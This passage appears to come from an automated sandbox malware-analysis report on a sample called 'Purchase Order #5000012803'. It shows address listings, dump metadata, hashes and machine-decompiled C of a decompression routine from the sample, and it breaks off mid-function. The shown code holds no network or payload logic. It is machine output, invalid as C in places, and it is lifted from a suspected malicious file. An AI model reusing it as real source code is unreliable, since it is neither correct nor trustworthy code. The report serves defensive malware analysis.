                      0x00000000
                      0x00000000
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x00000000
                      0x00406424
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x00000000
                      0x004066b5
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00000000
                      0x00406828
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x00000000
                      0x0040667d
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                      • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                      • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                      • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00405E9D(void* __ecx) {
                      				void* _v8;
                      				void* _v12;
                      				signed int _v16;
                      				unsigned int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				signed int _v44;
                      				signed int _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				signed int _v60;
                      				signed int _v64;
                      				signed int _v68;
                      				signed int _v72;
                      				signed int _v76;
                      				signed int _v80;
                      				signed int _v84;
                      				signed int _v88;
                      				signed int _v92;
                      				signed int _v95;
                      				signed int _v96;
                      				signed int _v100;
                      				signed int _v104;
                      				signed int _v108;
                      				signed int _v112;
                      				signed int _v116;
                      				signed int _v120;
                      				intOrPtr _v124;
                      				signed int _v128;
                      				signed int _v132;
                      				signed int _v136;
                      				void _v140;
                      				void* _v148;
                      				signed int _t537;
                      				signed int _t538;
                      				signed int _t572;
                      
                      				_t572 = 0x22;
                      				_v148 = __ecx;
                      				memcpy( &_v140, __ecx, _t572 << 2);
                      				if(_v52 == 0xffffffff) {
                      					return 1;
                      				}
                      				while(1) {
                      					L3:
                      					_t537 = _v140;
                      					if(_t537 > 0x1c) {
                      						break;
                      					}
                      					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
                      						case 0:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								goto L173;
                      							}
                      							_v112 = _v112 - 1;
                      							_v116 = _v116 + 1;
                      							_t537 =  *_v116;
                      							__eflags = _t537 - 0xe1;
                      							if(_t537 > 0xe1) {
                      								goto L174;
                      							}
                      							_t542 = _t537 & 0x000000ff;
                      							_push(0x2d);
                      							asm("cdq");
                      							_pop(_t576);
                      							_push(9);
                      							_pop(_t577);
                      							_t622 = _t542 / _t576;
                      							_t544 = _t542 % _t576 & 0x000000ff;
                      							asm("cdq");
                      							_t617 = _t544 % _t577 & 0x000000ff;
                      							_v64 = _t617;
                      							_v32 = (1 << _t622) - 1;
                      							_v28 = (1 << _t544 / _t577) - 1;
                      							_t625 = (0x300 << _t617 + _t622) + 0x736;
                      							__eflags = 0x600 - _v124;
                      							if(0x600 == _v124) {
                      								L12:
                      								__eflags = _t625;
                      								if(_t625 == 0) {
                      									L14:
                      									_v76 = _v76 & 0x00000000;
                      									_v68 = _v68 & 0x00000000;
                      									goto L17;
                      								} else {
                      									goto L13;
                      								}
                      								do {
                      									L13:
                      									_t625 = _t625 - 1;
                      									__eflags = _t625;
                      									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                      								} while (_t625 != 0);
                      								goto L14;
                      							}
                      							__eflags = _v8;
                      							if(_v8 != 0) {
                      								GlobalFree(_v8);
                      							}
                      							_t537 = GlobalAlloc(0x40, 0x600); // executed
                      							__eflags = _t537;
                      							_v8 = _t537;
                      							if(_t537 == 0) {
                      								goto L174;
                      							} else {
                      								_v124 = 0x600;
                      								goto L12;
                      							}
                      						case 1:
                      							L15:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 1;
                      								goto L173;
                      							}
                      							_v112 = _v112 - 1;
                      							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                      							_v116 = _v116 + 1;
                      							_t50 =  &_v76;
                      							 *_t50 = _v76 + 1;
                      							__eflags =  *_t50;
                      							L17:
                      							__eflags = _v76 - 4;
                      							if(_v76 < 4) {
                      								goto L15;
                      							}
                      							_t550 = _v68;
                      							__eflags = _t550 - _v120;
                      							if(_t550 == _v120) {
                      								L22:
                      								_v76 = 5;
                      								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                      								goto L25;
                      							}
                      							__eflags = _v12;
                      							_v120 = _t550;
                      							if(_v12 != 0) {
                      								GlobalFree(_v12);
                      							}
                      							_t537 = GlobalAlloc(0x40, _v68); // executed
                      							__eflags = _t537;
                      							_v12 = _t537;
                      							if(_t537 == 0) {
                      								goto L174;
                      							} else {
                      								goto L22;
                      							}
                      						case 2:
                      							L26:
                      							_t557 = _v100 & _v32;
                      							_v136 = 6;
                      							_v80 = _t557;
                      							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                      							goto L135;
                      						case 3:
                      							L23:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 3;
                      								goto L173;
                      							}
                      							_v112 = _v112 - 1;
                      							_t72 =  &_v116;
                      							 *_t72 = _v116 + 1;
                      							__eflags =  *_t72;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L25:
                      							_v76 = _v76 - 1;
                      							__eflags = _v76;
                      							if(_v76 != 0) {
                      								goto L23;
                      							}
                      							goto L26;
                      						case 4:
                      							L136:
                      							_t559 =  *_t626;
                      							_t610 = _t559 & 0x0000ffff;
                      							_t591 = (_v20 >> 0xb) * _t610;
                      							__eflags = _v16 - _t591;
                      							if(_v16 >= _t591) {
                      								_v20 = _v20 - _t591;
                      								_v16 = _v16 - _t591;
                      								_v68 = 1;
                      								_t560 = _t559 - (_t559 >> 5);
                      								__eflags = _t560;
                      								 *_t626 = _t560;
                      							} else {
                      								_v20 = _t591;
                      								_v68 = _v68 & 0x00000000;
                      								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                      							}
                      							__eflags = _v20 - 0x1000000;
                      							if(_v20 >= 0x1000000) {
                      								goto L142;
                      							} else {
                      								goto L140;
                      							}
                      						case 5:
                      							L140:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 5;
                      								goto L173;
                      							}
                      							_v20 = _v20 << 8;
                      							_v112 = _v112 - 1;
                      							_t464 =  &_v116;
                      							 *_t464 = _v116 + 1;
                      							__eflags =  *_t464;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L142:
                      							_t561 = _v136;
                      							goto L143;
                      						case 6:
                      							__edx = 0;
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__eax = _v8;
                      								__ecx = _v60;
                      								_v56 = 1;
                      								_v136 = 7;
                      								__esi = _v8 + 0x180 + _v60 * 2;
                      								goto L135;
                      							}
                      							__eax = _v96 & 0x000000ff;
                      							__esi = _v100;
                      							__cl = 8;
                      							__cl = 8 - _v64;
                      							__esi = _v100 & _v28;
                      							__eax = (_v96 & 0x000000ff) >> 8;
                      							__ecx = _v64;
                      							__esi = (_v100 & _v28) << 8;
                      							__ecx = _v8;
                      							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                      							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                      							__eflags = _v60 - 4;
                      							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                      							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                      							if(_v60 >= 4) {
                      								__eflags = _v60 - 0xa;
                      								if(_v60 >= 0xa) {
                      									_t103 =  &_v60;
                      									 *_t103 = _v60 - 6;
                      									__eflags =  *_t103;
                      								} else {
                      									_v60 = _v60 - 3;
                      								}
                      							} else {
                      								_v60 = 0;
                      							}
                      							__eflags = _v56 - __edx;
                      							if(_v56 == __edx) {
                      								__ebx = 0;
                      								__ebx = 1;
                      								goto L63;
                      							}
                      							__eax = _v24;
                      							__eax = _v24 - _v48;
                      							__eflags = __eax - _v120;
                      							if(__eax >= _v120) {
                      								__eax = __eax + _v120;
                      								__eflags = __eax;
                      							}
                      							__ecx = _v12;
                      							__ebx = 0;
                      							__ebx = 1;
                      							__al =  *((intOrPtr*)(__eax + __ecx));
                      							_v95 =  *((intOrPtr*)(__eax + __ecx));
                      							goto L43;
                      						case 7:
                      							__eflags = _v68 - 1;
                      							if(_v68 != 1) {
                      								__eax = _v40;
                      								_v132 = 0x16;
                      								_v36 = _v40;
                      								__eax = _v44;
                      								_v40 = _v44;
                      								__eax = _v48;
                      								_v44 = _v48;
                      								__eax = 0;
                      								__eflags = _v60 - 7;
                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      								__al = __al & 0x000000fd;
                      								__eax = (__eflags >= 0) - 1 + 0xa;
                      								_v60 = (__eflags >= 0) - 1 + 0xa;
                      								__eax = _v8;
                      								__eax = _v8 + 0x664;
                      								__eflags = __eax;
                      								_v92 = __eax;
                      								goto L71;
                      							}
                      							__eax = _v8;
                      							__ecx = _v60;
                      							_v136 = 8;
                      							__esi = _v8 + 0x198 + _v60 * 2;
                      							goto L135;
                      						case 8:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__eax = _v8;
                      								__ecx = _v60;
                      								_v136 = 0xa;
                      								__esi = _v8 + 0x1b0 + _v60 * 2;
                      							} else {
                      								__eax = _v60;
                      								__ecx = _v8;
                      								__eax = _v60 + 0xf;
                      								_v136 = 9;
                      								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                      								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                      							}
                      							goto L135;
                      						case 9:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								goto L92;
                      							}
                      							__eflags = _v100;
                      							if(_v100 == 0) {
                      								goto L174;
                      							}
                      							__eax = 0;
                      							__eflags = _v60 - 7;
                      							_t264 = _v60 - 7 >= 0;
                      							__eflags = _t264;
                      							0 | _t264 = _t264 + _t264 + 9;
                      							_v60 = _t264 + _t264 + 9;
                      							goto L78;
                      						case 0xa:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__eax = _v8;
                      								__ecx = _v60;
                      								_v136 = 0xb;
                      								__esi = _v8 + 0x1c8 + _v60 * 2;
                      								goto L135;
                      							}
                      							__eax = _v44;
                      							goto L91;
                      						case 0xb:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__ecx = _v40;
                      								__eax = _v36;
                      								_v36 = _v40;
                      							} else {
                      								__eax = _v40;
                      							}
                      							__ecx = _v44;
                      							_v40 = _v44;
                      							L91:
                      							__ecx = _v48;
                      							_v48 = __eax;
                      							_v44 = _v48;
                      							L92:
                      							__eax = _v8;
                      							_v132 = 0x15;
                      							__eax = _v8 + 0xa68;
                      							_v92 = _v8 + 0xa68;
                      							goto L71;
                      						case 0xc:
                      							L102:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0xc;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t340 =  &_v116;
                      							 *_t340 = _v116 + 1;
                      							__eflags =  *_t340;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							__eax = _v48;
                      							goto L104;
                      						case 0xd:
                      							L39:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0xd;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t127 =  &_v116;
                      							 *_t127 = _v116 + 1;
                      							__eflags =  *_t127;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L41:
                      							__eax = _v68;
                      							__eflags = _v76 - _v68;
                      							if(_v76 != _v68) {
                      								goto L50;
                      							}
                      							__eflags = __ebx - 0x100;
                      							if(__ebx >= 0x100) {
                      								goto L56;
                      							}
                      							L43:
                      							__eax = _v95 & 0x000000ff;
                      							_v95 = _v95 << 1;
                      							__ecx = _v92;
                      							__eax = (_v95 & 0x000000ff) >> 7;
                      							_v76 = __eax;
                      							__eax = __eax + 1;
                      							__eax = __eax << 8;
                      							__eax = __eax + __ebx;
                      							__esi = _v92 + __eax * 2;
                      							_v20 = _v20 >> 0xb;
                      							__ax =  *__esi;
                      							_v88 = __esi;
                      							__edx = __ax & 0x0000ffff;
                      							__ecx = (_v20 >> 0xb) * __edx;
                      							__eflags = _v16 - __ecx;
                      							if(_v16 >= __ecx) {
                      								_v20 = _v20 - __ecx;
                      								_v16 = _v16 - __ecx;
                      								__cx = __ax;
                      								_v68 = 1;
                      								__cx = __ax >> 5;
                      								__eflags = __eax;
                      								__ebx = __ebx + __ebx + 1;
                      								 *__esi = __ax;
                      							} else {
                      								_v68 = _v68 & 0x00000000;
                      								_v20 = __ecx;
                      								0x800 = 0x800 - __edx;
                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							__eflags = _v20 - 0x1000000;
                      							_v72 = __ebx;
                      							if(_v20 >= 0x1000000) {
                      								goto L41;
                      							} else {
                      								goto L39;
                      							}
                      						case 0xe:
                      							L48:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0xe;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t161 =  &_v116;
                      							 *_t161 = _v116 + 1;
                      							__eflags =  *_t161;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							while(1) {
                      								L50:
                      								__eflags = __ebx - 0x100;
                      								if(__ebx >= 0x100) {
                      									break;
                      								}
                      								__eax = _v92;
                      								__edx = __ebx + __ebx;
                      								__ecx = _v20;
                      								__esi = __edx + __eax;
                      								__ecx = _v20 >> 0xb;
                      								__ax =  *__esi;
                      								_v88 = __esi;
                      								__edi = __ax & 0x0000ffff;
                      								__ecx = (_v20 >> 0xb) * __edi;
                      								__eflags = _v16 - __ecx;
                      								if(_v16 >= __ecx) {
                      									_v20 = _v20 - __ecx;
                      									_v16 = _v16 - __ecx;
                      									__cx = __ax;
                      									_t175 = __edx + 1; // 0x1
                      									__ebx = _t175;
                      									__cx = __ax >> 5;
                      									__eflags = __eax;
                      									 *__esi = __ax;
                      								} else {
                      									_v20 = __ecx;
                      									0x800 = 0x800 - __edi;
                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      									__ebx = __ebx + __ebx;
                      									 *__esi = __cx;
                      								}
                      								__eflags = _v20 - 0x1000000;
                      								_v72 = __ebx;
                      								if(_v20 >= 0x1000000) {
                      									continue;
                      								} else {
                      									goto L48;
                      								}
                      							}
                      							L56:
                      							_t178 =  &_v56;
                      							 *_t178 = _v56 & 0x00000000;
                      							__eflags =  *_t178;
                      							goto L57;
                      						case 0xf:
                      							L60:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0xf;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t208 =  &_v116;
                      							 *_t208 = _v116 + 1;
                      							__eflags =  *_t208;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L62:
                      							__eflags = __ebx - 0x100;
                      							if(__ebx >= 0x100) {
                      								L57:
                      								__al = _v72;
                      								_v96 = _v72;
                      								goto L58;
                      							}
                      							L63:
                      							__eax = _v92;
                      							__edx = __ebx + __ebx;
                      							__ecx = _v20;
                      							__esi = __edx + __eax;
                      							__ecx = _v20 >> 0xb;
                      							__ax =  *__esi;
                      							_v88 = __esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = (_v20 >> 0xb) * __edi;
                      							__eflags = _v16 - __ecx;
                      							if(_v16 >= __ecx) {
                      								_v20 = _v20 - __ecx;
                      								_v16 = _v16 - __ecx;
                      								__cx = __ax;
                      								_t222 = __edx + 1; // 0x1
                      								__ebx = _t222;
                      								__cx = __ax >> 5;
                      								__eflags = __eax;
                      								 *__esi = __ax;
                      							} else {
                      								_v20 = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							__eflags = _v20 - 0x1000000;
                      							_v72 = __ebx;
                      							if(_v20 >= 0x1000000) {
                      								goto L62;
                      							} else {
                      								goto L60;
                      							}
                      						case 0x10:
                      							L112:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0x10;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t371 =  &_v116;
                      							 *_t371 = _v116 + 1;
                      							__eflags =  *_t371;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							goto L114;
                      						case 0x11:
                      							L71:
                      							__esi = _v92;
                      							_v136 = 0x12;
                      							goto L135;
                      						case 0x12:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__eax = _v92;
                      								_v136 = 0x13;
                      								__esi = _v92 + 2;
                      								L135:
                      								_v88 = _t626;
                      								goto L136;
                      							}
                      							__eax = _v80;
                      							_v52 = _v52 & 0x00000000;
                      							__ecx = _v92;
                      							__eax = _v80 << 4;
                      							__eflags = __eax;
                      							__eax = _v92 + __eax + 4;
                      							goto L133;
                      						case 0x13:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								_t475 =  &_v92;
                      								 *_t475 = _v92 + 0x204;
                      								__eflags =  *_t475;
                      								_v52 = 0x10;
                      								_v68 = 8;
                      								L147:
                      								_v128 = 0x14;
                      								goto L148;
                      							}
                      							__eax = _v80;
                      							__ecx = _v92;
                      							__eax = _v80 << 4;
                      							_v52 = 8;
                      							__eax = _v92 + (_v80 << 4) + 0x104;
                      							L133:
                      							_v92 = __eax;
